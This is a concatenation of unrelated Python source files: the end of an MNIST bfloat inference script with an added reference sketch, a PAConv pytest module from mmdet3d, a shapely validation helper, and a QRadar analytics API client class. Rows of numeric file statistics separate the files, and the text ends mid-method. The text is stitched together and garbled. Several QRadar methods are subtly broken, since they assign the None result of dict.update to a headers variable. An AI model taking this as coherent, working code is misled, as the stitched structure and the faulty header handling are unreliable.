0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000]
_mem = [0] * 32
do_mnist7_mem(img, _mem, 28*28)
for i in range(10):
if __python__:
from float2bfloat import float2bfloat
from float2bfloat import bfloat2float
print(i, _mem[i], bfloat2float(_mem[i]))
else:
print(i, _mem[i])
test()
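For clarity, the following plain-float reference (not part of the source) shows the computation do_mnist7_mem performs: a single dense layer y = x·W + b over the flattened 28x28 image, producing 10 class scores. The helper name is hypothetical.
# Reference sketch in ordinary floats of what do_mnist7_mem computes above.
# W is laid out row-major as 784 x 10, matching the rom_w indexing in the source.
def mnist_dense_reference(x, W, b):
    y = [0.0] * 10
    xi = 0
    for i in range(28 * 28):
        for j in range(10):
            y[j] += x[i] * W[xi + j]   # multiply-accumulate, mirrors bfloat.mul_add
        xi += 10
    return [y[j] + b[j] for j in range(10)]  # add bias, mirrors bfloat.add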
| 55.628378
| 75
| 0.653711
| 948
| 8,233
| 5.638186
| 0.128692
| 1.452573
| 2.108138
| 2.716558
| 0.783162
| 0.776801
| 0.776801
| 0.76782
| 0.76782
| 0.76782
| 0
| 0.601911
| 0.237216
| 8,233
| 147
| 76
| 56.006803
| 0.249204
| 0.01166
| 0
| 0.484848
| 0
| 0
| 0
| 0
| 0
| 0
| 0.578384
| 0
| 0
| 1
| 0.015152
| false
| 0
| 0.083333
| 0
| 0.098485
| 0.015152
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
cb69bac8b80a4cffb481f5f3dd21ee71e8f19149
| 10,432
|
py
|
Python
|
tests/test_models/test_common_modules/test_paconv_modules.py
|
Bachmvp/mmdetection3d
|
b5b1a15a885eee92749e60a5837e2ce4918119f8
|
[
"Apache-2.0"
] | 10
|
2021-09-13T13:07:37.000Z
|
2022-03-15T06:46:30.000Z
|
tests/test_models/test_common_modules/test_paconv_modules.py
|
Bachmvp/mmdetection3d
|
b5b1a15a885eee92749e60a5837e2ce4918119f8
|
[
"Apache-2.0"
] | 1
|
2021-11-10T07:14:32.000Z
|
2021-11-10T07:14:32.000Z
|
tests/test_models/test_common_modules/test_paconv_modules.py
|
Bachmvp/mmdetection3d
|
b5b1a15a885eee92749e60a5837e2ce4918119f8
|
[
"Apache-2.0"
] | 1
|
2021-09-01T08:27:24.000Z
|
2021-09-01T08:27:24.000Z
|
import numpy as np
import pytest
import torch
def test_paconv_sa_module_msg():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import PAConvSAModuleMSG
# paconv_num_kernels should have same length as mlp_channels
with pytest.raises(AssertionError):
self = PAConvSAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4]]).cuda()
# inner lengths of paconv_num_kernels should match mlp_channels
with pytest.raises(AssertionError):
self = PAConvSAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4, 4], [8, 8]]).cuda()
self = PAConvSAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4], [8]],
norm_cfg=dict(type='BN2d'),
use_xyz=False,
pool_mod='max',
paconv_kernel_input='w_neighbor').cuda()
assert self.mlps[0].layer0.in_channels == 12 * 2
assert self.mlps[0].layer0.out_channels == 16
assert self.mlps[1].layer0.in_channels == 12 * 2
assert self.mlps[1].layer0.out_channels == 32
assert self.mlps[0].layer0.bn.num_features == 16
assert self.mlps[1].layer0.bn.num_features == 32
assert self.mlps[0].layer0.scorenet.mlps.layer0.conv.in_channels == 7
assert self.mlps[0].layer0.scorenet.mlps.layer3.conv.out_channels == 4
assert self.mlps[1].layer0.scorenet.mlps.layer0.conv.in_channels == 7
assert self.mlps[1].layer0.scorenet.mlps.layer3.conv.out_channels == 8
# last conv in ScoreNet has neither bn nor relu
with pytest.raises(AttributeError):
_ = self.mlps[0].layer0.scorenet.mlps.layer3.bn
with pytest.raises(AttributeError):
_ = self.mlps[0].layer0.scorenet.mlps.layer3.activate
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
# (B, N, 3)
xyz = torch.from_numpy(xyz).view(1, -1, 3).cuda()
# (B, C, N)
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
# test forward
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 48, 16])
assert inds.shape == torch.Size([1, 16])
# test with identity kernel input
self = PAConvSAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4], [8]],
norm_cfg=dict(type='BN2d'),
use_xyz=False,
pool_mod='max',
paconv_kernel_input='identity').cuda()
assert self.mlps[0].layer0.in_channels == 12 * 1
assert self.mlps[0].layer0.out_channels == 16
assert self.mlps[0].layer0.num_kernels == 4
assert self.mlps[1].layer0.in_channels == 12 * 1
assert self.mlps[1].layer0.out_channels == 32
assert self.mlps[1].layer0.num_kernels == 8
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
# (B, N, 3)
xyz = torch.from_numpy(xyz).view(1, -1, 3).cuda()
# (B, C, N)
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
# test forward
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 48, 16])
assert inds.shape == torch.Size([1, 16])
def test_paconv_sa_module():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import build_sa_module
sa_cfg = dict(
type='PAConvSAModule',
num_point=16,
radius=0.2,
num_sample=8,
mlp_channels=[12, 32],
paconv_num_kernels=[8],
norm_cfg=dict(type='BN2d'),
use_xyz=True,
pool_mod='max',
paconv_kernel_input='w_neighbor')
self = build_sa_module(sa_cfg).cuda()
assert self.mlps[0].layer0.in_channels == 15 * 2
assert self.mlps[0].layer0.out_channels == 32
assert self.mlps[0].layer0.num_kernels == 8
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
# (B, N, 3)
xyz = torch.from_numpy(xyz[..., :3]).view(1, -1, 3).cuda()
# (B, C, N)
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
# test forward
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 32, 16])
assert inds.shape == torch.Size([1, 16])
# test kNN sampling when radius is None
sa_cfg = dict(
type='PAConvSAModule',
num_point=16,
radius=None,
num_sample=8,
mlp_channels=[12, 32],
paconv_num_kernels=[8],
norm_cfg=dict(type='BN2d'),
use_xyz=True,
pool_mod='max',
paconv_kernel_input='identity')
self = build_sa_module(sa_cfg).cuda()
assert self.mlps[0].layer0.in_channels == 15 * 1
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
xyz = torch.from_numpy(xyz[..., :3]).view(1, -1, 3).cuda()
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 32, 16])
assert inds.shape == torch.Size([1, 16])
def test_paconv_cuda_sa_module_msg():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import PAConvCUDASAModuleMSG
# paconv_num_kernels should have same length as mlp_channels
with pytest.raises(AssertionError):
self = PAConvCUDASAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4]]).cuda()
# inner lengths of paconv_num_kernels should match mlp_channels
with pytest.raises(AssertionError):
self = PAConvCUDASAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4, 4], [8, 8]]).cuda()
self = PAConvCUDASAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4], [8]],
norm_cfg=dict(type='BN2d'),
use_xyz=False,
pool_mod='max',
paconv_kernel_input='w_neighbor').cuda()
assert self.mlps[0][0].in_channels == 12 * 2
assert self.mlps[0][0].out_channels == 16
assert self.mlps[0][0].num_kernels == 4
assert self.mlps[0][0].bn.num_features == 16
assert self.mlps[1][0].in_channels == 12 * 2
assert self.mlps[1][0].out_channels == 32
assert self.mlps[1][0].num_kernels == 8
assert self.mlps[1][0].bn.num_features == 32
assert self.mlps[0][0].scorenet.mlps.layer0.conv.in_channels == 7
assert self.mlps[0][0].scorenet.mlps.layer3.conv.out_channels == 4
assert self.mlps[1][0].scorenet.mlps.layer0.conv.in_channels == 7
assert self.mlps[1][0].scorenet.mlps.layer3.conv.out_channels == 8
# last conv in ScoreNet has neither bn nor relu
with pytest.raises(AttributeError):
_ = self.mlps[0][0].scorenet.mlps.layer3.bn
with pytest.raises(AttributeError):
_ = self.mlps[0][0].scorenet.mlps.layer3.activate
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
# (B, N, 3)
xyz = torch.from_numpy(xyz).view(1, -1, 3).cuda()
# (B, C, N)
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
# test forward
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 48, 16])
assert inds.shape == torch.Size([1, 16])
# CUDA PAConv only supports w_neighbor kernel_input
with pytest.raises(AssertionError):
self = PAConvCUDASAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4], [8]],
norm_cfg=dict(type='BN2d'),
use_xyz=False,
pool_mod='max',
paconv_kernel_input='identity').cuda()
def test_paconv_cuda_sa_module():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import build_sa_module
sa_cfg = dict(
type='PAConvCUDASAModule',
num_point=16,
radius=0.2,
num_sample=8,
mlp_channels=[12, 32],
paconv_num_kernels=[8],
norm_cfg=dict(type='BN2d'),
use_xyz=True,
pool_mod='max',
paconv_kernel_input='w_neighbor')
self = build_sa_module(sa_cfg).cuda()
assert self.mlps[0][0].in_channels == 15 * 2
assert self.mlps[0][0].out_channels == 32
assert self.mlps[0][0].num_kernels == 8
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
# (B, N, 3)
xyz = torch.from_numpy(xyz[..., :3]).view(1, -1, 3).cuda()
# (B, C, N)
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
# test forward
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 32, 16])
assert inds.shape == torch.Size([1, 16])
# test kNN sampling when radius is None
sa_cfg = dict(
type='PAConvCUDASAModule',
num_point=16,
radius=None,
num_sample=8,
mlp_channels=[12, 32],
paconv_num_kernels=[8],
norm_cfg=dict(type='BN2d'),
use_xyz=True,
pool_mod='max',
paconv_kernel_input='w_neighbor')
self = build_sa_module(sa_cfg).cuda()
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
xyz = torch.from_numpy(xyz[..., :3]).view(1, -1, 3).cuda()
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 32, 16])
assert inds.shape == torch.Size([1, 16])
| 34.773333
| 74
| 0.611676
| 1,514
| 10,432
| 4.060766
| 0.077279
| 0.050748
| 0.079701
| 0.051236
| 0.975114
| 0.969909
| 0.962915
| 0.94421
| 0.894925
| 0.8689
| 0
| 0.069164
| 0.23217
| 10,432
| 299
| 75
| 34.889632
| 0.698377
| 0.062117
| 0
| 0.802632
| 0
| 0
| 0.045706
| 0.025825
| 0
| 0
| 0
| 0
| 0.267544
| 1
| 0.017544
| false
| 0
| 0.030702
| 0
| 0.048246
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb87074da788855f7e82f073b6ec1768f63755d0
| 172
|
py
|
Python
|
TA-KML_lookup/bin/shapely/validation.py
|
l00py/KML_Lookup
|
76cf68bd97d0dd47e11bda7027d5b7ca2fdedaf5
|
[
"MIT"
] | 7
|
2017-10-26T00:23:17.000Z
|
2021-01-21T06:27:46.000Z
|
TA-KML_lookup/bin/shapely/validation.py
|
l00py/KML_Lookup
|
76cf68bd97d0dd47e11bda7027d5b7ca2fdedaf5
|
[
"MIT"
] | 12
|
2017-05-23T22:54:50.000Z
|
2019-07-31T17:26:17.000Z
|
TA-KML_lookup/bin/shapely/validation.py
|
l00py/KML_Lookup
|
76cf68bd97d0dd47e11bda7027d5b7ca2fdedaf5
|
[
"MIT"
] | 5
|
2017-05-23T00:44:10.000Z
|
2019-10-23T14:57:35.000Z
|
# TODO: allow for implementations using other than GEOS
import sys
from shapely.geos import lgeos
def explain_validity(ob):
return lgeos.GEOSisValidReason(ob._geom)
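A brief usage sketch (not part of the module) showing what explain_validity returns for an invalid geometry; the example polygon and the exact reason string are illustrative.
# Illustrative usage of explain_validity; the polygon below is intentionally self-intersecting.
from shapely.geometry import Polygon
from shapely.validation import explain_validity

bowtie = Polygon([(0, 0), (2, 2), (2, 0), (0, 2)])  # edges cross at (1, 1)
print(explain_validity(bowtie))  # e.g. "Self-intersection[1 1]"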
| 19.111111
| 55
| 0.790698
| 24
| 172
| 5.583333
| 0.833333
| 0.149254
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151163
| 172
| 8
| 56
| 21.5
| 0.917808
| 0.30814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
cb9d231c7b4ba578657e6709ebe3434d6d071268
| 24,553
|
py
|
Python
|
qradar4py/endpoints/analytics.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 10
|
2019-11-19T21:13:32.000Z
|
2021-11-17T19:35:53.000Z
|
qradar4py/endpoints/analytics.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 2
|
2021-05-21T16:15:16.000Z
|
2021-07-20T12:34:49.000Z
|
qradar4py/endpoints/analytics.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 6
|
2020-09-14T13:44:55.000Z
|
2021-11-17T19:35:55.000Z
|
from urllib.parse import urljoin
from qradar4py.endpoints.api_endpoint import QRadarAPIEndpoint
from qradar4py.endpoints.api_endpoint import request_vars
from qradar4py.endpoints.api_endpoint import header_vars
class Analytics(QRadarAPIEndpoint):
"""
The QRadar API endpoint group /analytics and its endpoints.
"""
__baseurl = 'analytics/'
def __init__(self, url, header, verify):
super().__init__(urljoin(url, self.__baseurl),
header,
verify)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_ade_rules(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/ade_rules
Retrieves a list of ADE rules.
"""
function_endpoint = urljoin(self._baseurl, 'ade_rules')
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_ade_rules_ade_rule_delete_tasks_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/ade_rules/ade_rule_delete_tasks/{task_id}
Retrieves the status of the ADE rule delete task.
"""
function_endpoint = urljoin(self._baseurl, 'ade_rules/ade_rule_delete_tasks/{task_id}'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_ade_rules_ade_rule_dependent_tasks_by_task_id(self, task_id, *, task, fields=None, **kwargs):
"""
POST /analytics/ade_rules/ade_rule_dependent_tasks/{task_id}
Cancels the dependent ADE rule task.
"""
function_endpoint = urljoin(self._baseurl,
'ade_rules/ade_rule_dependent_tasks/{task_id}'.format(task_id=task_id))
return self._call('POST', function_endpoint, json=task, **kwargs)
@request_vars('fields')
def get_ade_rules_ade_rule_dependent_tasks_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/ade_rules/ade_rule_dependent_tasks/{task_id}
Retrieves the status of the dependent ADE rule task.
"""
function_endpoint = urljoin(self._baseurl,
'ade_rules/ade_rule_dependent_tasks/{task_id}'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_ade_rules_ade_rule_dependent_tasks_results_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/ade_rules/ade_rule_dependent_tasks/{task_id}/results
Retrieves the ADE rule dependent task results.
"""
function_endpoint = urljoin(self._baseurl,
'ade_rules/ade_rule_dependent_tasks/{task_id}/results'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def delete_ade_rules_by_id(self, id, *, fields=None, **kwargs):
"""
DELETE /analytics/ade_rules/{id}
Deletes an ADE rule. To ensure safe deletion, a dependency check is carried out. The check might take some time. An asynchronous task is started to do this check.
"""
function_endpoint = urljoin(self._baseurl, 'ade_rules/{id}'.format(id=id))
return self._call('DELETE', function_endpoint, **kwargs)
@request_vars('fields')
def get_ade_rules_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/ade_rules/{id}
Retrieves an ADE rule.
"""
function_endpoint = urljoin(self._baseurl, 'ade_rules/{id}'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_ade_rules_by_id(self, id, *, ade_rule, fields=None, **kwargs):
"""
POST /analytics/ade_rules/{id}
Updates the ADE rule owner or enabled/disabled only.
"""
function_endpoint = urljoin(self._baseurl, 'ade_rules/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=ade_rule, **kwargs)
@request_vars('fields')
def get_ade_rules_dependents_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/ade_rules/{id}/dependents
Retrieves the objects that depend on the ADE rule.
"""
function_endpoint = urljoin(self._baseurl, 'ade_rules/{id}/dependents'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_building_blocks(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/building_blocks
Retrieves a list of building block rules.
"""
function_endpoint = urljoin(self._baseurl, 'building_blocks')
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_building_blocks_building_block_delete_tasks_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/building_blocks/building_block_delete_tasks/{task_id}
Retrieves the status of the building block rule delete task.
"""
function_endpoint = urljoin(self._baseurl,
'building_blocks/building_block_delete_tasks/{task_id}'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_building_blocks_building_block_dependent_tasks_by_task_id(self, task_id, *, task, fields=None, **kwargs):
"""
POST /analytics/building_blocks/building_block_dependent_tasks/{task_id}
Cancels the dependent building block rule task.
"""
function_endpoint = urljoin(self._baseurl,
'building_blocks/building_block_dependent_tasks/{task_id}'.format(task_id=task_id))
return self._call('POST', function_endpoint, json=task, **kwargs)
@request_vars('fields')
def get_building_blocks_building_block_dependent_tasks_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/building_blocks/building_block_dependent_tasks/{task_id}
Retrieves the status of the dependent building block rule task.
"""
function_endpoint = urljoin(self._baseurl,
'building_blocks/building_block_dependent_tasks/{task_id}'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_building_blocks_building_block_dependent_tasks_results_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/building_blocks/building_block_dependent_tasks/{task_id}/results
Retrieves the building block rule dependent task results.
"""
function_endpoint = urljoin(self._baseurl,
'building_blocks/building_block_dependent_tasks/{task_id}/results'.format(
task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_building_blocks_by_id(self, id, *, building_block, fields=None, **kwargs):
"""
POST /analytics/building_blocks/{id}
Updates the building block rule owner or enabled/disabled only.
"""
function_endpoint = urljoin(self._baseurl, 'building_blocks/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=building_block, **kwargs)
@request_vars('fields')
def get_building_blocks_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/building_blocks/{id}
Retrieves a building block rule.
"""
function_endpoint = urljoin(self._baseurl, 'building_blocks/{id}'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def delete_building_blocks_by_id(self, id, *, fields=None, **kwargs):
"""
DELETE /analytics/building_blocks/{id}
Deletes the building block rule. To ensure safe deletion, a dependency check is carried out. This check might take some time. An asynchronous task is started to perform this check.
"""
function_endpoint = urljoin(self._baseurl, 'building_blocks/{id}'.format(id=id))
return self._call('DELETE', function_endpoint, **kwargs)
@request_vars('fields')
def get_building_blocks_dependents_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/building_blocks/{id}/dependents
Retrieves the objects that depend on the building block rule.
"""
function_endpoint = urljoin(self._baseurl, 'building_blocks/{id}/dependents'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_building_blocks_with_data(self, *, building_block, fields=None, **kwargs):
"""
POST /analytics/building_blocks_with_data
Creates a building block with supplied rule_data xml
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'building_blocks_with_data')
return self._call('POST', function_endpoint, json=building_block, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_building_blocks_with_data(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/building_blocks_with_data
Retrieves a list of building block rules.
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'building_blocks_with_data')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('fields')
def post_building_blocks_with_data_by_id(self, id, *, building_block, fields=None, **kwargs):
"""
POST /analytics/building_blocks_with_data/{id}
Same as com.q1labs.core.api.R1_2017.customrule.BuildingBlockAPI.updateBuildingBlock(IFrameworkServices, ISessionContext, ILogger, Long, BuildingBlockDTO) but updates rule_data xml as well
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'building_blocks_with_data/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=building_block, headers=headers, **kwargs)
@request_vars('fields')
def get_building_blocks_with_data_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/building_blocks_with_data/{id}
Retrieves a building block rule.
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'building_blocks_with_data/{id}'.format(id=id))
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_custom_actions_actions(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/custom_actions/actions
Retrieves a list of available custom actions.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/actions')
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_custom_actions_actions(self, *, custom_action, fields=None, **kwargs):
"""
POST /analytics/custom_actions/actions
Creates a new custom action with the supplied fields.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/actions')
return self._call('POST', function_endpoint, json=custom_action, **kwargs)
def delete_custom_actions_actions_by_action_id(self, action_id, **kwargs):
"""
DELETE /analytics/custom_actions/actions/{action_id}
Deletes an existing custom action.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/actions/{action_id}'.format(action_id=action_id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
@header_vars('fields')
def post_custom_actions_actions_by_action_id(self, action_id, *, custom_action, fields=None, **kwargs):
"""
POST /analytics/custom_actions/actions/{action_id}
Updates an existing custom action.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/actions/{action_id}'.format(action_id=action_id))
return self._call('POST', function_endpoint, json=custom_action, **kwargs)
@request_vars('fields')
def get_custom_actions_actions_by_action_id(self, action_id, *, fields=None, **kwargs):
"""
GET /analytics/custom_actions/actions/{action_id}
Retrieves a custom action based on the supplied action_id.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/actions/{action_id}'.format(action_id=action_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_custom_actions_interpreters(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/custom_actions/interpreters
Retrieves a list of available custom action interpreters.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/interpreters')
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_custom_actions_interpreters_by_interpreter_id(self, interpreter_id, *, fields=None, **kwargs):
"""
GET /analytics/custom_actions/interpreters/{interpreter_id}
Retrieves a custom action interpreter based on supplied interpreter_id.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/interpreters/{interpreter_id}'.format(
interpreter_id=interpreter_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_custom_actions_scripts(self, *, file, fields=None, **kwargs):
"""
POST /analytics/custom_actions/scripts
Creates a new custom action script file. Newly created custom action script files require a deployment before using.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/scripts')
return self._call('POST', function_endpoint, mime_type={'Content-Type': 'application/octet-stream'}, data=file,
**kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_custom_actions_scripts(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/custom_actions/scripts
Retrieves a list of meta-data for available custom action script files.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/scripts')
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_custom_actions_scripts_by_script_id(self, script_id, *, fields=None, **kwargs):
"""
GET /analytics/custom_actions/scripts/{script_id}
Retrieves meta-data of a custom action script file based on supplied script_id.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/scripts/{script_id}'.format(script_id=script_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_custom_actions_scripts_by_script_id(self, script_id, *, file, fields=None, **kwargs):
"""
POST /analytics/custom_actions/scripts/{script_id}
Updates an existing custom action script file. Updated custom action script files require a deployment before using.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/scripts/{script_id}'.format(script_id=script_id))
return self._call('POST', function_endpoint, mime_type={'Content-Type': 'application/octet-stream'}, data=file,
**kwargs)
def delete_custom_actions_scripts_by_script_id(self, script_id, **kwargs):
"""
DELETE /analytics/custom_actions/scripts/{script_id}
Deletes an existing custom action script file.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/scripts/{script_id}'.format(script_id=script_id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
@header_vars('fields')
def post_custom_actions_test(self, *, custom_action_test_request, fields=None, **kwargs):
"""
POST /analytics/custom_actions/test
Hidden end-point to perform a test execution of a custom action
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'custom_actions/test')
return self._call('POST', function_endpoint, json=custom_action_test_request, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_rule_groups(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/rule_groups
Retrieves a list of the rule groups.
"""
function_endpoint = urljoin(self._baseurl, 'rule_groups')
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_rule_groups_by_group_id(self, group_id, *, group, fields=None, **kwargs):
"""
POST /analytics/rule_groups/{group_id}
Updates the owner of a rule group.
"""
function_endpoint = urljoin(self._baseurl, 'rule_groups/{group_id}'.format(group_id=group_id))
return self._call('POST', function_endpoint, json=group, **kwargs)
@request_vars('fields')
def get_rule_groups_by_group_id(self, group_id, *, fields=None, **kwargs):
"""
GET /analytics/rule_groups/{group_id}
Retrieves a rule group.
"""
function_endpoint = urljoin(self._baseurl, 'rule_groups/{group_id}'.format(group_id=group_id))
